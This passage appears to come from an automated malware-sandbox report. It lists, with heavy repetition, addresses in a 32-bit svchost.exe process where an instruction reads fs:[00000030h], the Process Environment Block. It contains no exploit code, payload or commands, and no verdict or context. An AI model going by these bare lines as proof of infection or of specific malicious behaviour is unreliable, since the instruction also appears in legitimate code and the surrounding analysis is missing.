          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0342A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]1_2_034380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]1_2_034B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]1_2_0342C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]1_2_034720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]1_2_0343208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]1_2_034280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]1_2_034C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]1_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]1_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]1_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]1_2_03430750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]1_2_034BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]1_2_034B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]1_2_03438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]1_2_0346C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]1_2_03430710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]1_2_03460710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]1_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]1_2_034AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]1_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]1_2_034B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]1_2_034BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]1_2_034D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]1_2_034307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]1_2_034E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]1_2_0344C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]1_2_03462674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]1_2_034AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]1_2_03472619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]1_2_0344E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]1_2_03466620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]1_2_03468620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]1_2_0343262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]1_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]1_2_0346C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]1_2_034666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]1_2_034C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]1_2_034365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]1_2_034325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]1_2_03432582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]1_2_03432582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]1_2_03464588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]1_2_0346E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]1_2_034EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]1_2_0342645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]1_2_0345245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]1_2_034BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]1_2_0342C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]1_2_034304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]1_2_034EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]1_2_034364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]1_2_034644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]1_2_034BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]1_2_034FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]1_2_034D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]1_2_03428B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]1_2_034DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]1_2_0342CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]1_2_03504B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]1_2_034DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]1_2_0345EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]1_2_034BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]1_2_034DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]1_2_034BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]1_2_0346CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]1_2_0345EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
